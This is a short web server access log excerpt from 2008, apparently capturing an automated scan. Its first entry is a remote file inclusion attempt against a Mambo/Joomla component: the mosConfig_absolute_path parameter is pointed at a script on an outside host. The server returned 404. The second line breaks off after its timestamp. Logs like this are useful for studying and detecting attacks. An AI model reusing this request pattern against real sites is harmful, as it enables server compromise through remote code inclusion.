98.136.50.138 - - [23/Oct/2008:09:14:17 -0700] "GET /logs//components/com_mosmedia/media.tab.php?mosConfig_absolute_path=%20%0Dhttp://acresofdiamonds.org/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [23/Oct/2008:09:14:17 -0700]